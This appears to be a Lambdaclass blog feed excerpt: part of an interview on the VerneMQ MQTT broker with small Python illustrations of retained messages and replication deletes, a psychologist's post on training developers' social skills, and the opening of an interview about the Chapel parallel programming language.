We stumbled upon the MQTT protocol while working for a customer on an IoT project that heavily used RabbitMQ and AMQP. Although AMQP was a requirement from the customer, we soon figured out that AMQP (and RabbitMQ) might not be the silver bullet for every messaging use case and started to look out for a better IoT protocol. We discovered MQTT and found it a very interesting addition to the other protocols that were widely in use back then and still are today. Especially the small protocol overhead and the focus on small devices (embedded and mobile) instead of big application servers enticed us to take the protocol a bit further. Even more so because at that time no scalable and clusterable MQTT broker was around; MQTT was always added as an addition to a ‘main’ protocol, as was done in RabbitMQ or Apache Apollo. We generally disliked the idea of such a ‘multi-protocol’ capability. For example, an AMQP broker traditionally serves a few hundred to a few thousand publishers and subscribers with a high message throughput, so you build a broker around such scalability and performance requirements. However, a traditional MQTT case is the exact opposite: you have ‘a lot’ (a few thousand to a few hundred thousand, to millions) of clients, each one publishing very small messages only very rarely. Combining the two protocols in a single piece of software, reusing shared functionality, and still being able to match all the requirements from both worlds seemed like a tough job, too tough for us; back then no broker known to us did that successfully, and we think still no one does today.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Is there anything you dislike about MQTT or that needs an improvement?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
Sure, while MQTT v3.1.1 is a great protocol, there are a number of limitations. An example is the lack of negative acknowledgements. Take for example a client attempting to publish to a topic where it’s not authorized to do so: the only action allowed according to the spec is to simply disconnect the client with no way of telling it why, which is a bit heavy handed. Another example is that there is no way to add meta information to MQTT payloads such as a content type or decoding schemes etc. The only way to deal with this is to decide on an a priori scheme and encode this information into the payloads themselves. A common workaround is to embed the payload into a thin wrapper which contains such information — but it’s always ad-hoc in every system out there.&lt;&#x2F;p&gt;
&lt;p&gt;Fortunately the OASIS consortium has been collecting feedback from the community and carefully used it to develop the next version of the MQTT protocol, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;docs.oasis-open.org&#x2F;mqtt&#x2F;mqtt&#x2F;v5.0&#x2F;mqtt-v5.0.html&quot;&gt;MQTT protocol version 5.0&lt;&#x2F;a&gt;. This version basically addresses the issues mentioned above by incorporating them into the protocol, providing a standard way of doing things. We’re really excited about the new protocol version, so we even wrote a bit about it in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;vernemq.com&#x2F;blog&#x2F;2018&#x2F;06&#x2F;18&#x2F;is-mqttv5-worth-the-trouble.html&quot;&gt;Is MQTT 5 worth the trouble?&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why did you choose Erlang to implement it?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
We chose Erlang because it was the right tool for the job. Erlang was designed to support highly concurrent and highly available (through fault tolerance) systems, which fits exactly a project like VerneMQ. It was also important that the concurrency model was a first class concept and that the units of concurrency can’t block each other if one happens to run for a long time, as that would be detrimental when building a low latency system. There are a lot of other features which make Erlang a great tool to work with; the way supervision trees make writing defensive code unnecessary is an important one, as one only writes code to handle the cases the problem domain requires. This makes the code generally brief and concise. The core of VerneMQ including tests is about 30K lines of Erlang code, which we think is quite remarkable.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;After implementing it, do you think you made the right call using Erlang to implement VerneMQ?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
Yes, absolutely. To build the best possible product, Erlang was definitely the right choice. We still think it is one of the best options out there, though today there are other interesting options. To us an obvious one is Elixir, but another, albeit more exotic (we know this might sound ironic coming from Erlang devs) option would be something like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.ponylang.org&#x2F;&quot;&gt;Pony&lt;&#x2F;a&gt;, which is an extremely interesting language since it eliminates a lot of nasty error classes (deadlocks, data-races, exceptions etc.) via the type system, and the guys over at &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.wallaroolabs.com&quot;&gt;Wallaroo Labs&lt;&#x2F;a&gt; are building some pretty amazing stuff with it.&lt;&#x2F;p&gt;
&lt;p&gt;We really love Erlang, but we’re also being realistic that if there’s a better technology or the use case doesn’t require or benefit from the featureset we’re completely open to use other tools for the job.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;How do you retain messages and replicate subscription data?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
Great question! A retained message in MQTT is a message which is stored on the broker using a topic as the key; whenever a client subscribes to that particular topic, the broker delivers a copy of the message. Since VerneMQ is a distributed broker we need to replicate retained messages, and for this we currently use an implementation of the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;www.gsd.inesc-id.pt&#x2F;~ler&#x2F;reports&#x2F;srds07.pdf&quot;&gt;Plumtree&lt;&#x2F;a&gt; protocol which was initially implemented for the now defunct Basho Technologies’ distributed database &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;basho&#x2F;riak&quot;&gt;Riak&lt;&#x2F;a&gt;. Later this implementation was factored out into its own repository and we maintain our own &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;erlio&#x2F;plumtree&quot;&gt;fork&lt;&#x2F;a&gt; with a bunch of tweaks. Note that the replication mechanism in VerneMQ is eventually consistent, as this is much easier to scale since no distributed locking is required.&lt;&#x2F;p&gt;
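&lt;p&gt;Setting the distribution aside for a moment, the single-node behaviour being replicated can be sketched in a few lines. This toy broker (our illustration, with none of VerneMQ’s wildcards, persistence or clustering) keeps the last retained payload per topic and hands a copy to every late subscriber:&lt;&#x2F;p&gt;

```python
class TinyBroker:
    """Toy in-memory sketch of MQTT retained-message behaviour:
    the broker keeps the last retained message per topic and hands
    a copy to every new subscriber of that topic."""

    def __init__(self):
        self.retained = {}        # topic to last retained payload
        self.subscribers = {}     # topic to list of callbacks

    def publish(self, topic, payload, retain=False):
        if retain:
            self.retained[topic] = payload
        for callback in self.subscribers.get(topic, []):
            callback(topic, payload)

    def subscribe(self, topic, callback):
        self.subscribers.setdefault(topic, []).append(callback)
        if topic in self.retained:
            # A late subscriber still receives the retained message.
            callback(topic, self.retained[topic])

broker = TinyBroker()
broker.publish("status/door", "open", retain=True)

received = []
broker.subscribe("status/door", lambda t, p: received.append((t, p)))
print(received)  # [('status/door', 'open')]
```

&lt;p&gt;The hard part VerneMQ solves is exactly what this sketch omits: keeping that retained map consistent across a cluster of nodes.&lt;&#x2F;p&gt;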
&lt;p&gt;Besides the retained messages VerneMQ also needs to distribute client session state such as subscription information so each VerneMQ node is able to route the published messages across the cluster.&lt;&#x2F;p&gt;
&lt;p&gt;This is all currently handled using Plumtree, and Plumtree is doing a great job of it. That said, Plumtree uses relatively many resources when syncing nodes (it uses &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Merkle_tree&quot;&gt;Merkle trees&lt;&#x2F;a&gt; under the hood), and using plain dotted vector clocks means that deleting things requires cluster-wide synchronization, as it is not possible to distinguish between something which was deleted and something which is just missing. To address this we’re working on implementing a new replication mechanism called &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;haslab.uminho.pt&#x2F;tome&#x2F;files&#x2F;global_logical_clocks.pdf&quot;&gt;Server Wide Clocks&lt;&#x2F;a&gt;, which combines vector clocks per key-value pair with a node-clock for each participating node, making it possible to establish a global history and thus discard events observed by all members. This makes deletions a special case of the general history-trimming process. Furthermore, replication with SWC is cheaper than in Plumtree, as no Merkle trees are needed and there’s a much smaller overhead per key-value pair on the wire while replicating the state.&lt;&#x2F;p&gt;
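&lt;p&gt;The delete problem mentioned above can be shown in miniature. In this toy illustration (ours, not VerneMQ code), a node that deletes a key by simply dropping it becomes indistinguishable, to a syncing peer, from a node that never stored the key, which is why plain per-key version vectors force tombstones or cluster-wide coordination:&lt;&#x2F;p&gt;

```python
# Node A stores a key with a per-key version vector, then deletes it
# by dropping the entry entirely. Node B never saw the key.
node_a = {"retained/topic1": ({"A": 1}, "payload")}
node_b = {}

del node_a["retained/topic1"]

# During an anti-entropy sync the two nodes now look identical for this
# key, so B cannot tell "A deleted it" apart from "A never had it".
print(node_a == node_b)  # True
```

&lt;p&gt;A node-wide clock, as in Server Wide Clocks, records everything a node has ever seen, so a key that is absent but covered by the node’s clock can safely be read as deleted.&lt;&#x2F;p&gt;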
&lt;p&gt;&lt;strong&gt;What load can VerneMQ manage? Do you have a concrete example (number of nodes, number of connections per node, throughput, latency, etc)?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
This is a difficult question to give a straight answer to. The main reason is that the scenarios, use cases, and deployment environments are very different: we know of people deploying a VerneMQ cluster on a couple of Raspberry Pis, and of others deploying a large cluster on Kubernetes. Unfortunately, many vendors have started to publish benchmarks that are hard, if not impossible, to reproduce, mainly for marketing purposes. While we don’t rule out doing this in the future, we’d prefer a more scientific approach. For now, &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;vernemq.com&#x2F;blog&#x2F;2016&#x2F;08&#x2F;26&#x2F;loadtesting-mqtt-brokers.html&quot;&gt;we develop and publish benchmarking tools&lt;&#x2F;a&gt;, so everyone can run a benchmark scenario matching their own use case and see how VerneMQ, and also other brokers, perform. Moreover, those benchmarking tools will simplify reproducibility once we do publish any sort of benchmarks.&lt;&#x2F;p&gt;
&lt;p&gt;That said, we have of course seen several interesting setups along the way. Some were more successful than others. For example, someone deployed a VerneMQ cluster of 80 nodes over multiple sites and managed to connect around 5 million clients. They obviously ran into multiple problems with such a setup and required our assistance to design a better architecture. Right now we’re helping a customer scale an MQTT application to 10+ million concurrent clients; we’ll see how this ends, but we’re quite confident that we’ll come up with a good VerneMQ setup for this case.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;How do you test VerneMQ?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
About 25% of the code is test code — of course this doesn’t mean much by itself, but we believe our test suites are pretty thorough. They can always be better, and we routinely add new tests whenever a bug is discovered or a new feature is added. Almost all of our tests are written as Common Test suites, as it’s a really fantastic framework that makes it easy to do both unit and integration tests. We do have a few tests written as EUnit tests, but almost all new tests are written using Common Test. We’re great fans of property-based testing, but so far we haven’t invested enough into building a proper property-based test suite. It’s something we’d love to do at some point, though.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What was the most challenging part of VerneMQ to design and build?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
In Joe Armstrong’s saying “Make it work, make it beautiful, make it fast”, the initial “Make it work” wasn’t too challenging: most of the engineering problems were already solved, and it was about combining multiple approaches. We borrowed a lot from the way Basho built and packaged the Riak database, as well as from the previously mentioned Plumtree. Moreover, the initial topic-trie routing algorithm was taken wholesale from the RabbitMQ MQTT plugin, and the early decision to use LevelDB for disk persistence simplified a lot in the beginning. So it wouldn’t be fair to say that that part was very challenging, especially at the beginning, when we just wanted it to work. The ‘supposed-to-be-challenging’ part was already solved by Erlang and its distributed nature. What was challenging back then was staying focused on what VerneMQ should become and not adding every possible feature in a half-baked way. So we focused on a solid plugin system instead of providing everything out of the box from day one. In retrospect, the engineering of the plugin system was actually quite challenging.&lt;&#x2F;p&gt;
&lt;p&gt;These days the implementation of SWC challenges us, as the distributed algorithm is quite complex and we couldn’t just use an existing library for it. Moreover, the implementation and integration of MQTT 5 further challenges our plugin system.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What’s ahead for VerneMQ?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
First of all, we’re going to get the MQTT 5 support merged into the master branch, and then work with the community and our users to squash the inevitable bugs and make it better. In parallel, we’re working on getting the improved replication mechanism (SWC) in place, which will be available in VerneMQ 2.0 but may also be made available in the 1.x series as an opt-in feature. Besides this, we’re working on improving the entire experience around containerization (Kubernetes, etc.), clustering, discoverability, and the tooling around all that. So there’s lots of interesting stuff going on.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What do you recommend to do or read (books, courses, RFCs, codebases, exercises) for young devs that want to start working with distributed systems?&lt;&#x2F;strong&gt;&lt;br &#x2F;&gt;
This is a really good question, but also a really hard one to give a good answer to. When we studied computer science, most of the results on distributed systems made so many crazy assumptions that they were more or less unusable for building actual systems. For a practitioner that was a disappointing experience, but it did give us a good understanding of what the challenges of distributed computing are. When starting out from scratch with distributed computing, learning the basics is probably a good place to start: the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;Fallacies_of_distributed_computing&quot;&gt;Fallacies of distributed computing&lt;&#x2F;a&gt; and some of the impossibility results such as the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;en.wikipedia.org&#x2F;wiki&#x2F;CAP_theorem&quot;&gt;CAP theorem&lt;&#x2F;a&gt;. To really learn about and understand distributed systems, it’s important to work and play with them, and for this we of course recommend either Erlang or Elixir, as they come with distribution built in, so there’s a very low barrier to getting started. The actor model of Erlang also forces one to start thinking about message passing and building protocols, which is really what distributed systems are all about.&lt;&#x2F;p&gt;
&lt;p&gt;To learn anything the best advice usually is to make sure to play and have fun. So go have fun!&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>How to pretend you have social skills</title>
          <pubDate>Tue, 14 Aug 2018 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-pretend-you-have-social-skills/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-pretend-you-have-social-skills/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/how-to-pretend-you-have-social-skills/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-Zn-cHY_cpFVxmhkIAwhYzw.png&quot; alt=&quot;&quot; &#x2F;&gt;A software company from another dimension&lt;&#x2F;p&gt;
&lt;p&gt;This time I decided to do something uncommon. I have asked Martina Cantaro, a psychologist who works for our company &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;lambdaclass.com&#x2F;&quot;&gt;Lambdaclass&lt;&#x2F;a&gt;, to write about the work she is doing training young developers. I hope you find it useful.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;My role at Lambda is to help young developers train their social skills so they can perform at their best. Soft skills are not secondary to technical knowledge — they are what makes that knowledge shine, by making it useful to the human beings with and for whom we work. Many good technical developers tend to underestimate the need for social&#x2F;soft skills.&lt;&#x2F;p&gt;
&lt;p&gt;First of all, let’s define what social skills are. According to Wikipedia, social skills involve:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Coordination — Adjusting actions in relation to others’ actions&lt;&#x2F;li&gt;
&lt;li&gt;Mentoring — Teaching and helping others how to do something (e.g. a study partner).&lt;&#x2F;li&gt;
&lt;li&gt;Negotiation — Discussion aimed at reaching an agreement.&lt;&#x2F;li&gt;
&lt;li&gt;Persuasion — The action or fact of persuading someone or of being persuaded to do or believe something.&lt;&#x2F;li&gt;
&lt;li&gt;Service Orientation — Actively looking for ways to evolve compassionately and grow psycho-socially with people.&lt;&#x2F;li&gt;
&lt;li&gt;Social Perceptiveness — Being aware of others’ reactions and able to respond in an understanding manner.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;Since many people have asked me how to develop soft skills and which are the most common problems, I thought I’d share a few vignettes of what I do at Lambda. I hope you find them as interesting as I do.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Don’t kill the dog&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Two programmers had received a message from the client via Slack. The message seemed pretty straightforward. It said: “Feature X isn’t working”. Next, the client’s tech lead listed a series of detailed steps to solve this problem. This client was pretty new, so we needed some help understanding how to solve it, since the issue was related to business rules we didn’t know. The diligent programmers followed the steps carefully and, once they were done, reported back to the client: “There! It’s done”; and went on to fulfill the tasks that were awaiting them in GitHub.&lt;&#x2F;p&gt;
&lt;p&gt;A few hours later, the programmers were shocked to hear that the client was not happy at all. “Feature X still isn’t working!” the client demanded. “But we followed the instructions you sent to the letter!”, the programmers cried out. They repeated this defense to me when we talked about the issue a few days later in our weekly workshop.&lt;&#x2F;p&gt;
&lt;p&gt;Well, I said, and paused, trying to come up with a metaphor that would put things into perspective for them. Then I saw Simon, our office dog. “If I take Simon to the vet because he has a stomach ache, and I tell the vet to please anesthetize him, cut him open, swap his liver with his bladder and stitch him up, the vet will promptly stop me and tell me we need to find an alternative solution. Alternatively, if she does exactly as I said, and Simon dies, I will know I need to find a better vet”.&lt;&#x2F;p&gt;
&lt;p&gt;The client described a problem to you. The fact that they helpfully provided you with a path to a solution doesn’t mean that they just wanted you to blindly follow the steps and call it a day. The primary goal is always fixing the problem.&lt;&#x2F;p&gt;
&lt;p&gt;The takeaway here is: &lt;strong&gt;your job is to find solutions to problems&lt;&#x2F;strong&gt;. Test your solutions. Make sure you provided a solution for the client’s problem. Their suggestions may help but it’s not their job to spell out the solution for you. Otherwise it would be program-by-numbers! Always remember your goal. Test what you just did to see if you met that goal. If the provided solution didn’t work, try another one. If you don’t have permission to modify something, report back: the client needs to know it couldn’t be fixed by you and why.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;The truth in your heart&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I was coaching programmers before an interview with a client. One of the topics we expected would come up was their opinion on different programming languages and tools. We didn’t know the interviewer’s style, so the interview could be more structured or more like a casual conversation on programming. I began with some basic, open-ended questions, like “what programming language do you prefer and why?”.&lt;&#x2F;p&gt;
&lt;p&gt;There are two types of wrong answers to this question. I call one the “dogmatic” answer and the other the “judgement day” answer.&lt;&#x2F;p&gt;
&lt;p&gt;The Dogmatic knows exactly how to answer that question because there’s only one possible answer. There is only one language to conquer all languages, and it is usually the one they happen to use. This language has every feature that matters, and none of its disadvantages are really that important. It can do almost anything. Most problems can and should be solved using this language. And all naysayers are stupid.&lt;&#x2F;p&gt;
&lt;p&gt;On the other hand, we have the Judgement Day answer. One programmer just couldn’t make up his mind. He’s a very centered person, who likes to be precise and think through issues before taking a stance. Great qualities for a critical thinker, but in an interview setting his hesitation could be taken the wrong way. He hummed and hawed, and only after I pressured him a bit did he come up with “Haskell”. Very well, I said, why do you prefer it? He quickly made two or three very valid points and also mentioned its downsides — he had clearly thought about the pros and cons of the language before — and then paused and said candidly: “but I’m not sure Haskell is really my favorite programming language”. Well, I told him, when Judgement Day comes, you’d better think it through 100%. There are many pros and cons to each language, and entire books could be written about why each one is better than the others. But for now, we’ll settle for a 90% accurate answer. Because the question is not really about that.&lt;&#x2F;p&gt;
&lt;p&gt;I mean, sure, the interviewer does want to know which programming language you prefer. But what they truly want to find out, if they are decent interviewers, is the analysis behind your choice. Why did you choose that language? Are you aware of its downsides? Do you know which situations it’s best for? So there’s not one correct answer. Haskell would have been as good an answer as Erlang, as long as you are able to justify it.&lt;&#x2F;p&gt;
&lt;p&gt;I find this happens often with less experienced devs. Their hearts are too pure. They are eager to search their souls and hand you their deepest truth. Also, they are not sure what exactly is being evaluated by these interview questions.&lt;&#x2F;p&gt;
&lt;p&gt;Of course, if the company works with Erlang and you fervently praise Cobol, the interviewer might think you won’t be a good match. So, to sum up, as long as your answer is 1) relevant to them and 2) well justified, you’ll be forgiven for not plunging your hand into your chest, pulling out your heart and finding out what programming language is written in there.&lt;&#x2F;p&gt;
&lt;p&gt;So, young developers of the world, don’t fret. If you feel paralyzed when an interviewer asks how you see yourself in five years, remember she doesn’t want you to read the future; she wants to learn about your motivation and goals. The same goes for your favorite programming language. Keep in mind, however, that the person interviewing you might lack social skills too! You can’t entirely control the outcome of the interview.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;0-tb0bOX6gqdjieBZE.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Communication&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Most of the programmers at Lambda speak English as a second language — their first one being Spanish. Since communication between the programmers and the (often English-speaking) client is key to performing well, we devised a series of exercises to improve their communication skills.&lt;&#x2F;p&gt;
&lt;p&gt;In order for a client-programmer conversation about code to be effective, both have to have a similar representation of the code on their minds. Code is an abstract structure, and both have to build that structure in their heads in order to discuss it. It is also important to be able to clearly articulate and understand the transformations we want to make to that structure — often in a non-native language.&lt;&#x2F;p&gt;
&lt;p&gt;So we began with this exercise:&lt;&#x2F;p&gt;
&lt;p&gt;I built a series of increasingly complex structures using common office objects and photographed them. Then I scattered the elements on the table and instructed one person to look at the photograph of the structure and give out verbal instructions to another person to replicate the structure in the photograph.&lt;&#x2F;p&gt;
&lt;p&gt;This proved to be more challenging than it seemed. Trial and error were very frequent. I encouraged them to give out more and more precise instructions: “Rotate the spoon? How many degrees, in which direction?”. Ideally, sentences would be self-explanatory and steps should be followed without trial and error.&lt;&#x2F;p&gt;
&lt;p&gt;I then instructed the executor of the instructions to proceed as if they were deactivating a bomb — to make a move only if they were absolutely certain the movement was going to be accurate. If not, they should ask for clarification.&lt;&#x2F;p&gt;
&lt;p&gt;By the third or fourth iteration, their sentences had become longer and better structured, and their language more precise. The executor was also more alert and made sure they understood instructions perfectly.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Technical problems and people problems: know the difference&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Sometimes personal issues are disguised as technical ones. For example, a worker who repeatedly points out minor mistakes to a colleague in front of third parties might be motivated not by a desire to improve the quality of the work but by a desire to make the other person feel uncomfortable.&lt;&#x2F;p&gt;
&lt;p&gt;When we first learned to identify these sorts of situations, one case popped up. Some programmers were working for a client in cooperation with another service company. The tech lead of this company had been on the project since the beginning and was not keen on having newcomers on it. He frequently withheld information the programmers needed to complete their tasks and was bent on chastising them for their mistakes on the general chat.&lt;&#x2F;p&gt;
&lt;p&gt;The situation was so bad that there was legitimate concern that this was an attempt to push our programmers out of the project, so the situation had to be handled with great care so as to not make matters worse.&lt;&#x2F;p&gt;
&lt;p&gt;So on one occasion where the chastising was particularly bad and unwarranted, our project manager intervened. He answered on the same chat channel that work was being carried out according to the plan and there was no basis for the criticisms being made, effectively standing between the angry tech lead and the programmers with a sword and shiny armor, ready to defend them against attacks.&lt;&#x2F;p&gt;
&lt;p&gt;One of our less experienced programmers, however, felt bad about the situation and wanted to placate Angry Tech Lead. He didn’t know what he had done wrong, but he wanted to make the situation OK.&lt;&#x2F;p&gt;
&lt;p&gt;So, following the epic defense of the project manager, he wrote an apology on the same channel. This opened a flank for the angry tech lead to continue his attack, rendering the project manager’s defense useless.&lt;&#x2F;p&gt;
&lt;p&gt;We analyzed this dynamic later. Here, the hierarchical structure of the company dictated that if your higher-up was deflecting the attack, there was no need to take the hit. In fact, taking the hit could justify subsequent attacks by Angry Tech Lead.&lt;&#x2F;p&gt;
&lt;p&gt;Two lessons were drawn from this: first, to trust the higher-ups’ handling of the situation (or at least talk to them first), because they are probably protecting you. Secondly, we dissected the situation and distinguished constructive criticism from destructive criticism. Constructive criticism is given in a spirit of cooperation, with respect, and it provides information on how to correct the mistake or avoid it in the future. It is also often dosed so that it doesn’t overwhelm the recipient, unless the matter is urgent. When it is about a task, it focuses on the problem and not the person. But in this case there was little cooperation, since information was being withheld, criticism flowed like a cascade, and there was no focus on how to accomplish the task more efficiently.&lt;&#x2F;p&gt;
&lt;p&gt;What at first had seemed to them a technical problem now revealed itself as a people’s problem. This took us a little further into understanding the complex relationship between both realms.&lt;&#x2F;p&gt;
&lt;p&gt;Like Captain Spock, we combine the world of logical thinking with the human dimension, which may seem irrational when analyzed through the cold prism of mathematical rationality but has its own logic and meaning. And we need to develop skills in both areas because, ultimately, we are humans working for other humans — code is just our tool.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Interview with Brad Chamberlain about a productive parallel programming language called Chapel</title>
          <pubDate>Mon, 12 Feb 2018 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-brad-chamberlain-about-chapel-a-productive-parallel-programming-language/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-brad-chamberlain-about-chapel-a-productive-parallel-programming-language/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-brad-chamberlain-about-chapel-a-productive-parallel-programming-language/">&lt;p&gt;As you might know, I am a big fan of concurrency, parallelism and distribution but I know almost nothing about high performance computing (HPC) so I decided to get out from my comfort area. This time I’ve interviewed Brad Chamberlain about &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;chapel-lang&#x2F;chapel&quot;&gt;Chapel&lt;&#x2F;a&gt;, a productive parallel programming language.&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-Vbk8JH0pBz1gSHSbxV799A.png&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What problems does Chapel solve? Who is the ideal user of Chapel?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Chapel supports scalable parallel programming in a portable way: programs developed on a user’s multicore laptop can be run on commodity clusters, the cloud, and supercomputers from &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;www.cray.com&#x2F;&quot;&gt;Cray&lt;&#x2F;a&gt; or other vendors. Chapel is also designed to vastly improve the productivity of performance-oriented programming, whether serial or parallel. As such, it supports programs with Python-like clarity while retaining the performance of lower-level approaches to programming like C, C++, Fortran, MPI, and OpenMP (the &lt;em&gt;de facto&lt;&#x2F;em&gt; standards for high-performance parallel programming).&lt;&#x2F;p&gt;
&lt;p&gt;Ideal Chapel users include Python programmers who are interested in parallel or performance-oriented programming as well as parallel programmers who are fed up with conventional approaches.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Were there any other previous languages that tried to solve the same issue?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Definitely. There’s a long list of failed attempts at developing scalable parallel programming languages, and skeptics like to remind you of them all the time: “If all of these languages have failed, how will you ever succeed?” In designing Chapel, we spent a lot of time reviewing other parallel languages to learn from their mistakes. Historically, I’d say that most parallel languages have failed for one of two reasons: Many were too high-level, limiting what an expert programmer could explicitly control while requiring a lot from their compilers. Others were lower-level, but as a result didn’t provide sufficient appeal over existing approaches like MPI.&lt;&#x2F;p&gt;
&lt;p&gt;Our response to this tension was to design a language using what we refer to as a &lt;em&gt;multiresolution philosophy&lt;&#x2F;em&gt;: Chapel supports higher-level features like parallel loops and distributed arrays for productivity and ease-of-use. Yet, it also supports lower-level features that give programmers more explicit control over the system. Notably, the high-level features are implemented in terms of the lower-level features within Chapel itself. This provides programmers with the ability to extend the language by creating their own abstractions. For example, an advanced Chapel user can implement new work-scheduling policies for their parallel loops, or new distributions or memory layouts for their arrays.&lt;&#x2F;p&gt;
&lt;p&gt;In my opinion, many scalable parallel language attempts have also failed to gain traction because they’ve been insufficiently general-purpose. Once programmers have a capability, they tend to be reluctant to give it up. This lack of generality often stems from the fact that most efforts have been undertaken by academic groups who need to pick their battles in order to publish papers and graduate students. With Chapel, we’ve created a language whose capabilities exceed those of C or Fortran with MPI and OpenMP, and that strives to be as attractive to read and write as Python.&lt;&#x2F;p&gt;
&lt;p&gt;It’s obviously very difficult for any new programming language to succeed, yet that’s no reason to avoid pursuing them — particularly when existing languages have major capability gaps. In our case, we believe that parallelism and locality are first-class programming concerns — not just in High-Performance Computing (HPC) where they make or break a program’s ability to scale well, but also in mainstream programming now that multicore processors and accelerators are pervasive. That said, parallelism and locality have traditionally been afterthoughts in language design. So rather than being paralyzed by the challenges of language adoption, we’re striving to fill that gap. And happily, users seem to be excited by our efforts.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;In some ways, don’t OpenMP, MPI, and CUDA solve the same problem?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;OpenMP, MPI, and CUDA are the &lt;em&gt;de facto&lt;&#x2F;em&gt; standards for HPC programmers today when targeting multicore processors, distributed memory systems, and (NVIDIA) GPUs, respectively. In that sense, Chapel is targeting a similar problem space as they are. However, they’re not considered very productive approaches and are great illustrations of my claim that parallelism and locality are traditionally afterthoughts in language design: they’re implemented using pragmas, libraries, and language extensions rather than first-class syntax and semantics. As a result, they feel like they’re “tacked on” rather than a core part of the language. This hurts not just their ease-of-use but also their ability to be optimized by compilers.&lt;&#x2F;p&gt;
&lt;p&gt;These approaches also tend to be very specific to a given type of parallelism in the system architecture: If you’ve written an OpenMP program and now want to run it at scale on a cluster or a Cray, you’ll have to rewrite it in something like MPI, which requires learning a completely different set of features and abstractions. In contrast, Chapel is designed to support parallel programming across these diverse types of parallel hardware with a single, unified set of features for expressing parallelism and locality.&lt;&#x2F;p&gt;
